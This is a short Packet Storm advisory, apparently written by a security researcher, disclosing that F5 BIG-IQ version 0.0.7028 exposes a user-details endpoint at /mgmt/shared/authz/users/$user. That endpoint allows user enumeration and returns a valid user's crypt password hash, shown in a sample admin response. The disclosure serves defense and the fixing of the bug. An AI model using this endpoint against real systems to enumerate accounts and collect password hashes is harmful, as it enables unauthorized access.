BIG-IQ version 0.0.7028 appears to disclose user passwords that are encrypted via an insecure direct object reference vulnerability and allows for user enumeration.
618c281cd293dfb71e842366efeeddc1f0dae18a8875e74149d2084d9cb32a1e
Hi,
I'm testing BIG-IQ v 0.0.7028,( no the last HF but i don't see the bug fix in the HF1) the new mngmt of F5 BIG-IP, i see that you are loggout and join to the next link
LINK : (where $user is the user)
https://127.0.0.1/mgmt/shared/authz/users/$user/
When i open this link and try some diff users like invalid users like test i get a java dump with a 404 error beacuase the use folder no exist.
"{"code":404,"message":"shared/authz/users/test","referer"
But if you try with a valid user like admin ( by default)
Yo get some details
{"name":"admin","displayName":"Admin User","encryptedPassword":"$6$5wF011Sk$xTaSIc.OKXUWJQ/BftjLiPzO7yjm3./Lw3TXLJ5Sge.AJv3mkA0EJds1dMX9jeKlNHS4ha1111puBSB/s61","groupReferences":[],"generation":6,"lastUpdateMicros":1430840911116662,"kind":"shared:authz:users:usersworkerstate","selfLink":"https://localhost/mgmt/shared/authz/users/admin"}
I think that is important fix it, and not display the users like a folder.
Juan Pablo Lopez Yacubian
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed